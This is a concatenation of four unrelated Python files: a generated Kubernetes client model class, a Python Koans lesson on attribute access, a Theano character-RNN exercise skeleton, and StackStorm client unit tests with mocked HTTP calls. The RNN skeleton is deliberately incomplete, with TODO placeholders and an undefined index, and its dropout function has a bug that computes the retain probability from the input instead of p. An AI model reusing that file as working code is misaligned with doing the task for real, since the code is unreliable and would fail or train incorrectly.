result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, AppsV1beta1DeploymentRollback):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Partially based on AboutMessagePassing in the Ruby Koans
#
from runner.koan import *
class AboutAttributeAccess(Koan):
class TypicalObject:
pass
def test_calling_undefined_functions_normally_results_in_errors(self):
typical = self.TypicalObject()
with self.assertRaises(AttributeError): typical.foobar()
def test_calling_getattribute_causes_an_attribute_error(self):
typical = self.TypicalObject()
with self.assertRaises(AttributeError): typical.__getattribute__('foobar')
# THINK ABOUT IT:
#
# If the method __getattribute__() causes the AttributeError, then
# what would happen if we redefine __getattribute__()?
# ------------------------------------------------------------------
class CatchAllAttributeReads:
def __getattribute__(self, attr_name):
return "Someone called '" + attr_name + "' and it could not be found"
def test_all_attribute_reads_are_caught(self):
catcher = self.CatchAllAttributeReads()
self.assertRegexpMatches(catcher.foobar, "Someone called 'foobar' and it could not be found")
def test_intercepting_return_values_can_disrupt_the_call_chain(self):
catcher = self.CatchAllAttributeReads()
self.assertRegexpMatches(catcher.foobaz, "Someone called 'foobaz' and it could not be found") # This is fine
try:
catcher.foobaz(1)
except TypeError as ex:
err_msg = ex.args[0]
self.assertRegexpMatches(err_msg, "'str' object is not callable")
# foobaz returns a string. What happens to the '(1)' part?
# Try entering this into a python console to reproduce the issue:
#
# "foobaz"(1)
#
def test_changes_to_the_getattribute_implementation_affects_getattr_function(self):
catcher = self.CatchAllAttributeReads()
self.assertRegexpMatches(getattr(catcher, 'any_attribute'), "Someone called 'any_attribute' and it could not be found")
# ------------------------------------------------------------------
class WellBehavedFooCatcher:
def __getattribute__(self, attr_name):
if attr_name[:3] == "foo":
return "Foo to you too"
else:
return super().__getattribute__(attr_name)
def test_foo_attributes_are_caught(self):
catcher = self.WellBehavedFooCatcher()
self.assertEqual("Foo to you too", catcher.foo_bar)
self.assertEqual("Foo to you too", catcher.foo_baz)
def test_non_foo_messages_are_treated_normally(self):
catcher = self.WellBehavedFooCatcher()
with self.assertRaises(AttributeError): catcher.normal_undefined_attribute
# ------------------------------------------------------------------
global stack_depth
stack_depth = 0
class RecursiveCatcher:
def __init__(self):
global stack_depth
stack_depth = 0
self.no_of_getattribute_calls = 0
def __getattribute__(self, attr_name):
global stack_depth # We need something that is outside the scope of this class
stack_depth += 1
if stack_depth<=10: # to prevent a stack overflow
self.no_of_getattribute_calls += 1
# Oops! We just accessed an attribute (no_of_getattribute_calls)
# Guess what happens when self.no_of_getattribute_calls is
# accessed?
# Using 'object' directly because using super() here will also
# trigger a __getattribute__() call.
return object.__getattribute__(self, attr_name)
def my_method(self):
pass
def test_getattribute_is_a_bit_overzealous_sometimes(self):
catcher = self.RecursiveCatcher()
catcher.my_method()
global stack_depth
self.assertEqual(11, stack_depth)
# ------------------------------------------------------------------
class MinimalCatcher:
class DuffObject: pass
def __init__(self):
self.no_of_getattr_calls = 0
def __getattr__(self, attr_name):
self.no_of_getattr_calls += 1
return self.DuffObject
def my_method(self):
pass
def test_getattr_ignores_known_attributes(self):
catcher = self.MinimalCatcher()
catcher.my_method()
self.assertEqual(0, catcher.no_of_getattr_calls)
def test_getattr_only_catches_unknown_attributes(self):
catcher = self.MinimalCatcher()
catcher.purple_flamingos()
catcher.free_pie()
self.assertEqual('DuffObject',
type(catcher.give_me_duff_or_give_me_death()).__name__)
self.assertEqual(3, catcher.no_of_getattr_calls)
# ------------------------------------------------------------------
class PossessiveSetter(object):
def __setattr__(self, attr_name, value):
new_attr_name = attr_name
if attr_name[-5:] == 'comic':
new_attr_name = "my_" + new_attr_name
elif attr_name[-3:] == 'pie':
new_attr_name = "a_" + new_attr_name
object.__setattr__(self, new_attr_name, value)
def test_setattr_intercepts_attribute_assignments(self):
fanboy = self.PossessiveSetter()
fanboy.comic = 'The Laminator, issue #1'
fanboy.pie = 'blueberry'
self.assertEqual('blueberry', fanboy.a_pie)
prefix = 'my'
self.assertEqual("The Laminator, issue #1", getattr(fanboy, prefix + '_comic'))
# ------------------------------------------------------------------
class ScarySetter:
def __init__(self):
self.num_of_coconuts = 9
self._num_of_private_coconuts = 2
def __setattr__(self, attr_name, value):
new_attr_name = attr_name
if attr_name[0] != '_':
new_attr_name = "altered_" + new_attr_name
object.__setattr__(self, new_attr_name, value)
def test_it_modifies_external_attribute_as_expected(self):
setter = self.ScarySetter()
setter.e = "mc hammer"
self.assertEqual('mc hammer', setter.altered_e)
def test_it_mangles_some_internal_attributes(self):
setter = self.ScarySetter()
try:
coconuts = setter.num_of_coconuts
except AttributeError:
self.assertEqual(9, setter.altered_num_of_coconuts)
def test_in_this_case_private_attributes_remain_unmangled(self):
setter = self.ScarySetter()
self.assertEqual(2, setter._num_of_private_coconuts)
|
|
# -*- coding: utf-8 -*-
# @Author: massimo
# @Date: 2016-03-10 22:49:31
# @Last Modified by: massimo
# @Last Modified time: 2016-03-10 23:29:56
import numpy as np
import theano
import theano.tensor as T
from theano.sandbox.rng_mrg import MRG_RandomStreams as RandomStreams
import utils
from updates import adagrad, apply_momentum
import time
from collections import OrderedDict
import os
import cPickle as pkl
class VanillaCharRNN:
def __init__(
self,
rnn_layers=None,
batch_size=32,
grad_clip=5.0,
learning_rate=0.01,
momentum=0.5,
dropout_p_hidden=0.0,
numpy_rng=None,
theano_rng=None
):
if rnn_layers is None:
rnn_layers = [100, 100]
self.rnn_layers = rnn_layers
self.batch_size = batch_size
self.learning_rate = learning_rate
self.dropout_p_hidden = dropout_p_hidden
self.momentum = momentum
self.grad_clip = grad_clip
if numpy_rng is None:
numpy_rng = np.random.RandomState(2**30)
self.numpy_rng = numpy_rng
if theano_rng is None:
theano_rng = RandomStreams(2**30)
self.theano_rng = theano_rng
self.vocab, self.params, self.train_fn, self.sample_fn = None, None, None, None
def init(self):
# initialze the weigths for the Vanilla RNN
self.Wxh, self.Whh, self.bh = [], [], [] # input-to-hidden weights, hidden-to-hidden weights and biases
# TODO: initialize the parameters of the RNN. Use the functions defined in the utils package
self.Why = utils.init_weights((self.rnn_layers[i], self.vocab_size), rng=self.numpy_rng, name='Why') # hidden to output weights
self.by = theano.shared(value=np.zeros((self.vocab_size,), dtype=theano.config.floatX), borrow=True, name='by') # hidden to output bias
params = self.Wxh + self.Whh + self.bh + [self.Why, self.by]
return params
def model(self, X, dropout_p_hidden):
def _step_index(x_t, ht_1, Wxh, Whh, bh):
# x_t: array of type int32
# use indexing on Wxh matrix instead of hte dot product of the one-hot vectors for computational and memory efficiency
return T.tanh(Wxh[x_t] + T.dot(ht_1, Whh) + bh) # compute the next hidden state
def _step(x_t, ht_1, Wxh, Whh, bh):
return T.tanh(T.dot(x_t, Wxh) + T.dot(ht_1, Whh) + bh) # compute the next hidden state
x = X[:-1]
y = X[1:] # y is x shifted back by one character
# TODO: write the code to update the hidden states of the rnn here
# use theano.scan() to call the _step_index and _step functions iteratively over x
h = x
# h has shape (n_steps, batch_size, rnn_layers[-1])
y_logit = T.dot(h, self.Why) + self.by
# y_logit has shape (n_steps, batch_size, vocab_size)
# to compute the softmax properly, we need a 2 dimensional array with vocab_size has second dimension
y_logit = y_logit.reshape([y_logit.shape[0] * y_logit.shape[1], y_logit.shape[2]])
y_hat = self.softmax(y_logit)
cost = self.cross_entropy(y, y_hat)
return y_hat, cost
def model_sample(self, X, H, sampling_temp):
def _step_index(x_t, ht_1, Wxh, Whh, bh):
# x_t: array of type int32
# use indexing on Wxh matrix instead of hte dot product of the one-hot vectors for computational and memory efficiency
return T.tanh(Wxh[x_t] + T.dot(ht_1, Whh) + bh) # compute the next hidden state
def _step(x_t, ht_1, Wxh, Whh, bh):
return T.tanh(T.dot(x_t, Wxh) + T.dot(ht_1, Whh) + bh) # compute the next hidden state
H_new = []
# TODO: write the code for update the hidden state of the RNN after one step only
# Hint: no theano.scan() is required here
h = H_new[-1]
y_logit = T.dot(h, self.Why) + self.by
y_logit = y_logit.reshape([y_logit.shape[0] * y_logit.shape[1], y_logit.shape[2]])
y_hat = self.softmax(y_logit, sampling_temp)
return y_hat, H_new
def cross_entropy(self, y, y_hat):
# y_hat has shape (n_steps * batch_size, vocab_size)
# y has shape (n_steps, batch_size)
y_flatten = y.flatten()
y_hat_flatten = y_hat.flatten()
offsets = T.cast(T.arange(y_flatten.shape[0]) * self.vocab_size + y_flatten, 'int32')
cost = -T.log(y_hat_flatten[offsets])
cost = cost.reshape([y.shape[0], y.shape[1]])
cost = T.mean(cost, axis=0) # compute the average cost per input sequence
return T.mean(cost) # then the average batch cost
def softmax(self, x, temp=1.0):
# divide x by the softmax temperature to control sampling
x /= temp
# numerically stable version of softmax (it avoids exp to blowup due to high values of x)
exp_x = T.exp(x - T.max(x, axis=1, keepdims=True))
return exp_x / T.sum(exp_x, axis=1, keepdims=True)
# DROPOUT #
def dropout(self, x, p=0):
if p > 0:
retain_p = 1.0 - x
x *= self.theano_rng.binomial(x.shape, p=retain_p, dtype=theano.config.floatX)
x /= retain_p
return x
def get_params(self):
return self.params
def export_params(self):
return [p.get_value() for p in self.params]
def import_params(self, iparams):
assert len(self.params) == len(iparams), 'Different number of params ({} != {})'.format(len(self.params), len(iparams))
for psrc, pdest in zip(iparams, self.params):
pdest_shape = pdest.get_value(borrow=True).shape
assert psrc.shape == pdest_shape, 'Source and destination param shapes do not correspond ({} != {})'.format(psrc.shape, pdest_shape)
pdest.set_value(psrc, borrow=True)
def floatX(self, arr):
return np.asarray(arr, dtype=theano.config.floatX)
def _split_sequences(self, x_ix, seq_length=25, padding_char=' '):
# pad the entire text with spaces to make the total length multiple of sequence length
x_padding = np.asarray([self.ch_to_ix[padding_char]] * (seq_length - x_ix.shape[0] % seq_length), dtype=np.int32)
x_ix = np.concatenate((x_ix, x_padding))
# split x into blocks of length equal to seq_length
n_seqs = int(x_ix.shape[0] / seq_length)
x_ix = x_ix.reshape((n_seqs, seq_length))
return x_ix
def fit(self, x, valid=None, epochs=10, seq_length=25, sampling_temp=0.7, sample_freq=10, checkpoint_freq=10, checkpoints_dir='models', unk_char='*'):
# NOTE: checkpoints are generated only when a validation set is provided
# build the character vocabulary
vocab = set(x)
if self.vocab is None or vocab != self.vocab:
self.vocab = vocab
self.vocab.add(unk_char) # special placeholder for out-of-vocabulary characters
self.vocab_size = len(vocab)
self.ch_to_ix = {ch: i for i, ch in enumerate(vocab)}
self.ix_to_ch = {v: k for k, v in self.ch_to_ix.iteritems()}
print 'Vocab size:', self.vocab_size
# NOTE: checkpoints will be generated only if a validation set is provided
if self.train_fn is None:
print 'Compiling the training functions'
X = T.imatrix()
self.params = self.init()
y_hat, cost = self.model(X, self.dropout_p_hidden)
pgrads = T.grad(cost, wrt=self.params)
# gradient clipping to avoid exploding gradients
if self.grad_clip > 0.:
gnorm = T.sum([T.sum(g ** 2) for g in pgrads])
# to clip gradients we use the following heuristic
# new_g = g * grad_clip / total_grad_norm
pgrads = [T.switch(gnorm > self.grad_clip, g * self.grad_clip / gnorm, g) for g in pgrads]
updates = adagrad(cost, self.params, grads=pgrads, learning_rate=self.learning_rate)
if self.momentum > 0.:
updates = apply_momentum(updates, self.momentum)
self.train_fn = theano.function(inputs=[X], outputs=cost, updates=updates)
self.cost_fn = theano.function(inputs=[X], outputs=cost)
# convert strings to integer vectors
x_ix = np.asarray([self.ch_to_ix[ch] for ch in x], dtype=np.int32)
if valid is not None:
valid_ix = np.asarray([self.ch_to_ix.get(ch, self.ch_to_ix[unk_char]) for ch in valid], dtype=np.int32)
if not os.path.exists(checkpoints_dir):
os.makedirs(checkpoints_dir)
# Let's check the initial cost matches the expected one
# print 'Expected initial cost:', np.log(len(vocab))
# print 'Actual initial cost:', self.cost_fn(x_ix[:,None])
# split the training sequence into equal blocks of length seq_length
x_ix = self._split_sequences(x_ix, seq_length, padding_char=' ')
# randomly the training sequences
x_ix = x_ix[self.numpy_rng.permutation(x_ix.shape[0])]
# then start training
num_train_batches = -(-x_ix.shape[0] // self.batch_size)
print 'Training started'
train_cost_history = []
if valid is not None:
valid_cost_history = []
for e in range(epochs):
avg_cost = 0
for bidx in range(num_train_batches):
batch_x = x_ix[bidx * self.batch_size: (bidx + 1) * self.batch_size]
batch_cost = self.train_fn(batch_x.transpose([1, 0]))
train_cost_history.append(float(batch_cost))
if np.isnan(batch_cost):
print 'NaN cost detected. Abort'
return
avg_cost += batch_cost
avg_cost /= num_train_batches
if valid is not None:
valid_cost = float(self.cost_fn(valid_ix[:, None]))
valid_cost_history.append(valid_cost)
print 'Epoch: {} Train Loss: {:.4f} Valid Loss: {:.4f}'.format(e, avg_cost, valid_cost)
if checkpoint_freq > 0 and (e + 1) % checkpoint_freq == 0:
# pickle to save the current state of training
chk_path = os.path.join(checkpoints_dir, 'charrnn_vanilla_{}_epoch{}_t{:.4f}_v{:.4f}.pkl'.format(len(self.rnn_layers), e, avg_cost, valid_cost))
state = {
'epoch': e,
'train_cost_history': train_cost_history,
'valid_cost_history': valid_cost_history,
'train_cost': avg_cost,
'valid_cost': valid_cost,
'params': self.export_params(),
'vocab': self.vocab,
'rnn_layers': self.rnn_layers,
'batch_size': self.batch_size,
'learning_rate': self.learning_rate,
'dropout_p_hidden': self.dropout_p_hidden,
'momentum': self.momentum,
'grad_clip': self.grad_clip,
}
pkl.dump(state, open(chk_path, 'wb'), pkl.HIGHEST_PROTOCOL)
print 'Written checkpoint:', chk_path
else:
print 'Epoch: {} Train Loss: {:.4f}'.format(e + 1, avg_cost)
if (e + 1) % sample_freq == 0:
print '\nSampled string:\n{}\n'.format(self.sample(seed_string=''))
def init_from(self, checkpoint):
state = pkl.load(open(checkpoint, 'rb'))
# import the vocabulary
self.vocab = state['vocab']
self.ch_to_ix = {ch: i for i, ch in enumerate(self.vocab)}
self.ix_to_ch = {v: k for k, v in self.ch_to_ix.iteritems()}
self.vocab_size = len(self.vocab)
# import the network configuration
self.rnn_layers = state['rnn_layers']
self.batch_size = state['batch_size']
self.learning_rate = state['learning_rate']
self.dropout_p_hidden = state['dropout_p_hidden']
self.momentum = state['momentum']
self.grad_clip = state['grad_clip']
# import the network parameters
self.params = self.init()
self.import_params(state['params'])
self.train_fn, self.sample_fn = None, None
def sample(self, sample_length=100, sampling_temp=1.0, seed_string='', use_sampling=True):
if self.params is None:
print 'Run fit() or init_from() before sampling'
return
if self.sample_fn is None:
# symbolic variable for the softmax temperature
x = T.ivector()
temp = T.scalar()
# store the state of the rnn into a dedicated shared variable per layer
self.H = []
for i in range(len(self.rnn_layers)):
self.H.append(theano.shared(value=np.zeros((1, 1, self.rnn_layers[i]), dtype=theano.config.floatX), borrow=True, name='H_{}'.format(i)))
# build the sampler
y_hat_sample, H_new = self.model_sample(x, self.H, temp)
# update each hidden state in the rnn
updates = OrderedDict()
for i in range(len(self.rnn_layers)):
updates[self.H[i]] = H_new[i]
# define the sampling function
self.sample_fn = theano.function(inputs=[x, temp], outputs=y_hat_sample, updates=updates)
# ensure that the rnn state is set to zero
for i in range(len(self.rnn_layers)):
self.H[i].set_value(np.zeros((1, 1, self.rnn_layers[i]), dtype=theano.config.floatX), borrow=True)
if len(seed_string) == 0:
# start from an uniformly sampled character
seed_string = self.ix_to_ch[self.numpy_rng.randint(self.vocab_size)]
# bootstrap the rnn using the seed_string
for ch in seed_string:
next_char_proba = self.sample_fn([self.ch_to_ix[ch]], sampling_temp).squeeze()
sampled_str = []
# start the real sampling from the rnn
for i in range(sample_length):
if use_sampling:
ch_ix = self.numpy_rng.choice(self.vocab_size, p=next_char_proba)
else:
ch_ix = np.argmax(next_char_proba)
sampled_str.append(self.ix_to_ch[ch_ix])
next_char_proba = self.sample_fn([ch_ix], sampling_temp).squeeze()
return seed_string + ''.join(sampled_str)
from sys import argv
if __name__ == '__main__':
input_file = argv[1]
x = open(input_file, 'r').read()
train_size = int(0.9 * len(x))
valid_size = int(0.05 * len(x))
train_x = x[:train_size]
valid_x = x[train_size:train_size+valid_size]
test_x = x[train_size+valid_size:]
checkpoints_dir = os.path.splitext(os.path.basename(input_file))[0]
model = VanillaCharRNN(
rnn_layers=[256, 256],
batch_size=100,
grad_clip=5.0,
dropout_p_hidden=0.0,
learning_rate=0.01,
momentum=0.5)
t0 = time.time()
model.fit(train_x, valid=valid_x, epochs=100, seq_length=100, checkpoints_dir=checkpoints_dir)
print 'Training completed in {:.2f} sec'.format(time.time() - t0)
|
|
# Copyright 2020 The StackStorm Authors.
# Copyright 2019 Extreme Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import mock
import json
import logging
import unittest2
from tests import base
from st2client import models
from st2client.utils import httpclient
LOG = logging.getLogger(__name__)
class TestSerialization(unittest2.TestCase):
def test_resource_serialize(self):
instance = base.FakeResource(id="123", name="abc")
self.assertDictEqual(instance.serialize(), base.RESOURCES[0])
def test_resource_deserialize(self):
instance = base.FakeResource.deserialize(base.RESOURCES[0])
self.assertEqual(instance.id, "123")
self.assertEqual(instance.name, "abc")
class TestResourceManager(unittest2.TestCase):
@mock.patch.object(
httpclient.HTTPClient,
"get",
mock.MagicMock(
return_value=base.FakeResponse(json.dumps(base.RESOURCES), 200, "OK")
),
)
def test_resource_get_all(self):
mgr = models.ResourceManager(base.FakeResource, base.FAKE_ENDPOINT)
resources = mgr.get_all()
actual = [resource.serialize() for resource in resources]
expected = json.loads(json.dumps(base.RESOURCES))
self.assertListEqual(actual, expected)
@mock.patch.object(
httpclient.HTTPClient,
"get",
mock.MagicMock(
return_value=base.FakeResponse(json.dumps(base.RESOURCES), 200, "OK")
),
)
def test_resource_get_all_with_limit(self):
mgr = models.ResourceManager(base.FakeResource, base.FAKE_ENDPOINT)
resources = mgr.get_all(limit=50)
actual = [resource.serialize() for resource in resources]
expected = json.loads(json.dumps(base.RESOURCES))
self.assertListEqual(actual, expected)
@mock.patch.object(
httpclient.HTTPClient,
"get",
mock.MagicMock(
return_value=base.FakeResponse("", 500, "INTERNAL SERVER ERROR")
),
)
def test_resource_get_all_failed(self):
mgr = models.ResourceManager(base.FakeResource, base.FAKE_ENDPOINT)
self.assertRaises(Exception, mgr.get_all)
@mock.patch.object(
httpclient.HTTPClient,
"get",
mock.MagicMock(
return_value=base.FakeResponse(json.dumps(base.RESOURCES[0]), 200, "OK")
),
)
def test_resource_get_by_id(self):
mgr = models.ResourceManager(base.FakeResource, base.FAKE_ENDPOINT)
resource = mgr.get_by_id("123")
actual = resource.serialize()
expected = json.loads(json.dumps(base.RESOURCES[0]))
self.assertEqual(actual, expected)
@mock.patch.object(
httpclient.HTTPClient,
"get",
mock.MagicMock(return_value=base.FakeResponse("", 404, "NOT FOUND")),
)
def test_resource_get_by_id_404(self):
mgr = models.ResourceManager(base.FakeResource, base.FAKE_ENDPOINT)
resource = mgr.get_by_id("123")
self.assertIsNone(resource)
@mock.patch.object(
httpclient.HTTPClient,
"get",
mock.MagicMock(
return_value=base.FakeResponse("", 500, "INTERNAL SERVER ERROR")
),
)
def test_resource_get_by_id_failed(self):
mgr = models.ResourceManager(base.FakeResource, base.FAKE_ENDPOINT)
self.assertRaises(Exception, mgr.get_by_id)
@mock.patch.object(
httpclient.HTTPClient,
"get",
mock.MagicMock(
return_value=base.FakeResponse(
json.dumps([base.RESOURCES[0]]), 200, "OK", {}
)
),
)
def test_resource_query(self):
mgr = models.ResourceManager(base.FakeResource, base.FAKE_ENDPOINT)
resources = mgr.query(name="abc")
actual = [resource.serialize() for resource in resources]
expected = json.loads(json.dumps([base.RESOURCES[0]]))
self.assertEqual(actual, expected)
@mock.patch.object(
httpclient.HTTPClient,
"get",
mock.MagicMock(
return_value=base.FakeResponse(
json.dumps([base.RESOURCES[0]]), 200, "OK", {"X-Total-Count": "50"}
)
),
)
def test_resource_query_with_count(self):
mgr = models.ResourceManager(base.FakeResource, base.FAKE_ENDPOINT)
resources, count = mgr.query_with_count(name="abc")
actual = [resource.serialize() for resource in resources]
expected = json.loads(json.dumps([base.RESOURCES[0]]))
self.assertEqual(actual, expected)
self.assertEqual(count, 50)
@mock.patch.object(
httpclient.HTTPClient,
"get",
mock.MagicMock(
return_value=base.FakeResponse(
json.dumps([base.RESOURCES[0]]), 200, "OK", {}
)
),
)
def test_resource_query_with_limit(self):
mgr = models.ResourceManager(base.FakeResource, base.FAKE_ENDPOINT)
resources = mgr.query(name="abc", limit=50)
actual = [resource.serialize() for resource in resources]
expected = json.loads(json.dumps([base.RESOURCES[0]]))
self.assertEqual(actual, expected)
@mock.patch.object(
httpclient.HTTPClient,
"get",
mock.MagicMock(
return_value=base.FakeResponse(
"", 404, "NOT FOUND", {"X-Total-Count": "30"}
)
),
)
def test_resource_query_404(self):
mgr = models.ResourceManager(base.FakeResource, base.FAKE_ENDPOINT)
# No X-Total-Count
resources = mgr.query(name="abc")
self.assertListEqual(resources, [])
@mock.patch.object(
httpclient.HTTPClient,
"get",
mock.MagicMock(
return_value=base.FakeResponse(
"", 404, "NOT FOUND", {"X-Total-Count": "30"}
)
),
)
def test_resource_query_with_count_404(self):
mgr = models.ResourceManager(base.FakeResource, base.FAKE_ENDPOINT)
resources, count = mgr.query_with_count(name="abc")
self.assertListEqual(resources, [])
self.assertIsNone(count)
@mock.patch.object(
httpclient.HTTPClient,
"get",
mock.MagicMock(
return_value=base.FakeResponse("", 500, "INTERNAL SERVER ERROR")
),
)
def test_resource_query_failed(self):
mgr = models.ResourceManager(base.FakeResource, base.FAKE_ENDPOINT)
self.assertRaises(Exception, mgr.query, name="abc")
@mock.patch.object(
httpclient.HTTPClient,
"get",
mock.MagicMock(
return_value=base.FakeResponse(
json.dumps([base.RESOURCES[0]]), 200, "OK", {}
)
),
)
def test_resource_get_by_name(self):
mgr = models.ResourceManager(base.FakeResource, base.FAKE_ENDPOINT)
# No X-Total-Count
resource = mgr.get_by_name("abc")
actual = resource.serialize()
expected = json.loads(json.dumps(base.RESOURCES[0]))
self.assertEqual(actual, expected)
@mock.patch.object(
httpclient.HTTPClient,
"get",
mock.MagicMock(return_value=base.FakeResponse("", 404, "NOT FOUND")),
)
def test_resource_get_by_name_404(self):
mgr = models.ResourceManager(base.FakeResource, base.FAKE_ENDPOINT)
resource = mgr.get_by_name("abc")
self.assertIsNone(resource)
@mock.patch.object(
httpclient.HTTPClient,
"get",
mock.MagicMock(
return_value=base.FakeResponse(json.dumps(base.RESOURCES), 200, "OK")
),
)
def test_resource_get_by_name_ambiguous(self):
mgr = models.ResourceManager(base.FakeResource, base.FAKE_ENDPOINT)
self.assertRaises(Exception, mgr.get_by_name, "abc")
@mock.patch.object(
httpclient.HTTPClient,
"get",
mock.MagicMock(
return_value=base.FakeResponse("", 500, "INTERNAL SERVER ERROR")
),
)
def test_resource_get_by_name_failed(self):
mgr = models.ResourceManager(base.FakeResource, base.FAKE_ENDPOINT)
self.assertRaises(Exception, mgr.get_by_name)
@mock.patch.object(
httpclient.HTTPClient,
"post",
mock.MagicMock(
return_value=base.FakeResponse(json.dumps(base.RESOURCES[0]), 200, "OK")
),
)
def test_resource_create(self):
mgr = models.ResourceManager(base.FakeResource, base.FAKE_ENDPOINT)
instance = base.FakeResource.deserialize('{"name": "abc"}')
resource = mgr.create(instance)
self.assertIsNotNone(resource)
@mock.patch.object(
httpclient.HTTPClient,
"post",
mock.MagicMock(
return_value=base.FakeResponse("", 500, "INTERNAL SERVER ERROR")
),
)
def test_resource_create_failed(self):
mgr = models.ResourceManager(base.FakeResource, base.FAKE_ENDPOINT)
instance = base.FakeResource.deserialize('{"name": "abc"}')
self.assertRaises(Exception, mgr.create, instance)
@mock.patch.object(
httpclient.HTTPClient,
"put",
mock.MagicMock(
return_value=base.FakeResponse(json.dumps(base.RESOURCES[0]), 200, "OK")
),
)
def test_resource_update(self):
mgr = models.ResourceManager(base.FakeResource, base.FAKE_ENDPOINT)
text = '{"id": "123", "name": "cba"}'
instance = base.FakeResource.deserialize(text)
resource = mgr.update(instance)
self.assertIsNotNone(resource)
@mock.patch.object(
httpclient.HTTPClient,
"put",
mock.MagicMock(
return_value=base.FakeResponse("", 500, "INTERNAL SERVER ERROR")
),
)
def test_resource_update_failed(self):
mgr = models.ResourceManager(base.FakeResource, base.FAKE_ENDPOINT)
text = '{"id": "123", "name": "cba"}'
instance = base.FakeResource.deserialize(text)
self.assertRaises(Exception, mgr.update, instance)
@mock.patch.object(
httpclient.HTTPClient,
"get",
mock.MagicMock(
return_value=base.FakeResponse(
json.dumps([base.RESOURCES[0]]), 200, "OK", {}
)
),
)
@mock.patch.object(
httpclient.HTTPClient,
"delete",
mock.MagicMock(return_value=base.FakeResponse("", 204, "NO CONTENT")),
)
def test_resource_delete(self):
mgr = models.ResourceManager(base.FakeResource, base.FAKE_ENDPOINT)
instance = mgr.get_by_name("abc")
mgr.delete(instance)
@mock.patch.object(
httpclient.HTTPClient,
"delete",
mock.MagicMock(return_value=base.FakeResponse("", 404, "NOT FOUND")),
)
def test_resource_delete_404(self):
mgr = models.ResourceManager(base.FakeResource, base.FAKE_ENDPOINT)
instance = base.FakeResource.deserialize(base.RESOURCES[0])
mgr.delete(instance)
@mock.patch.object(
httpclient.HTTPClient,
"get",
mock.MagicMock(
return_value=base.FakeResponse(
json.dumps([base.RESOURCES[0]]), 200, "OK", {}
)
),
)
@mock.patch.object(
httpclient.HTTPClient,
"delete",
mock.MagicMock(
return_value=base.FakeResponse("", 500, "INTERNAL SERVER ERROR")
),
)
def test_resource_delete_failed(self):
mgr = models.ResourceManager(base.FakeResource, base.FAKE_ENDPOINT)
instance = mgr.get_by_name("abc")
self.assertRaises(Exception, mgr.delete, instance)
@mock.patch.object(
httpclient.HTTPClient,
"get",
mock.MagicMock(
return_value=base.FakeResponse(
json.dumps([base.RESOURCES[0]]), 200, "OK", {}
)
),
)
@mock.patch.object(
httpclient.HTTPClient,
"delete",
mock.MagicMock(return_value=base.FakeResponse("", 204, "NO CONTENT")),
)
def test_resource_delete_action(self):
mgr = models.ResourceManager(base.FakeResource, base.FAKE_ENDPOINT)
instance = mgr.get_by_name("abc")
mgr.delete_action(instance, True)
@mock.patch.object(
httpclient.HTTPClient,
"delete",
mock.MagicMock(return_value=base.FakeResponse("", 404, "NOT FOUND")),
)
def test_resource_delete_action_404(self):
mgr = models.ResourceManager(base.FakeResource, base.FAKE_ENDPOINT)
instance = base.FakeResource.deserialize(base.RESOURCES[0])
mgr.delete_action(instance, False)
@mock.patch.object(
httpclient.HTTPClient,
"get",
mock.MagicMock(
return_value=base.FakeResponse(
json.dumps([base.RESOURCES[0]]), 200, "OK", {}
)
),
)
@mock.patch.object(
httpclient.HTTPClient,
"delete",
mock.MagicMock(
return_value=base.FakeResponse("", 500, "INTERNAL SERVER ERROR")
),
)
def test_resource_delete_action_failed(self):
mgr = models.ResourceManager(base.FakeResource, base.FAKE_ENDPOINT)
instance = mgr.get_by_name("abc")
self.assertRaises(Exception, mgr.delete_action, instance, True)
@mock.patch("requests.get")
@mock.patch("sseclient.SSEClient")
def test_stream_resource_listen(self, mock_sseclient, mock_requests):
mock_msg = mock.Mock()
mock_msg.data = json.dumps(base.RESOURCES)
# checking the case to specify valid 'cacert' parameter to the StreamManager
def side_effect_checking_verify_parameter_is():
return [mock_msg]
mock_sseclient.return_value.events.side_effect = (
side_effect_checking_verify_parameter_is
)
mgr = models.StreamManager("https://example.com", cacert="/path/ca.crt")
resp = mgr.listen(events=["foo", "bar"])
self.assertEqual(list(resp), [base.RESOURCES])
call_args = tuple(["https://example.com/stream?events=foo%2Cbar"])
call_kwargs = {"stream": True, "verify": "/path/ca.crt"}
self.assertEqual(mock_requests.call_args_list[0][0], call_args)
self.assertEqual(mock_requests.call_args_list[0][1], call_kwargs)
# checking the case not to specify valid 'cacert' parameter to the StreamManager
def side_effect_checking_verify_parameter_is_not():
return [mock_msg]
mock_sseclient.return_value.events.side_effect = (
side_effect_checking_verify_parameter_is_not
)
mgr = models.StreamManager("https://example.com")
resp = mgr.listen()
self.assertEqual(list(resp), [base.RESOURCES])
call_args = tuple(["https://example.com/stream?"])
call_kwargs = {"stream": True}
self.assertEqual(mock_requests.call_args_list[1][0], call_args)
self.assertEqual(mock_requests.call_args_list[1][1], call_kwargs)
@mock.patch.object(
httpclient.HTTPClient,
"post",
mock.MagicMock(
return_value=base.FakeResponse(json.dumps(base.RESOURCES[0]), 200, "OK")
),
)
def test_resource_clone(self):
mgr = models.ResourceManager(base.FakeResource, base.FAKE_ENDPOINT)
source_ref = "spack.saction"
resource = mgr.clone(source_ref, "dpack", "daction", False)
self.assertIsNotNone(resource)
@mock.patch.object(
httpclient.HTTPClient,
"post",
mock.MagicMock(
return_value=base.FakeResponse("", 500, "INTERNAL SERVER ERROR")
),
)
def test_resource_clone_failed(self):
mgr = models.ResourceManager(base.FakeResource, base.FAKE_ENDPOINT)
source_ref = "spack.saction"
self.assertRaises(Exception, mgr.clone, source_ref, "dpack", "daction")
|
